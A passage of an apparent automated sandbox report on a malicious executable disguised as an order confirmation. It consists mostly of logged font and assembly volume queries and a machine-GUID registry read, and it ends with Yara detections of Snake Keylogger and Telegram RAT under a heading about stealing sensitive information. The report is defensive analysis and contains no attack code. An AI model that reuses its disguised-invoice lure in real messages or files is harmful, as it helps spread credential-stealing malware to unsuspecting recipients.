                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.order confirmation 46574 -QT-04-0022.exe.37f2570.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.order confirmation 46574 -QT-04-0022.exe.37ca550.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.order confirmation 46574 -QT-04-0022.exe.37ca550.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.order confirmation 46574 -QT-04-0022.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.order confirmation 46574 -QT-04-0022.exe.37f2570.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000000.340523862.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.340127336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.339361837.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.527594880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000000.339756744.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.343064408.00000000037F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.342975236.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.order confirmation 46574 -QT-04-0022.exe.37f2570.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.12.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.order confirmation 46574 -QT-04-0022.exe.37ca550.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.order confirmation 46574 -QT-04-0022.exe.37ca550.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.order confirmation 46574 -QT-04-0022.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.0.order confirmation 46574 -QT-04-0022.exe.400000.4.unpack, type: UNPACKEDPE
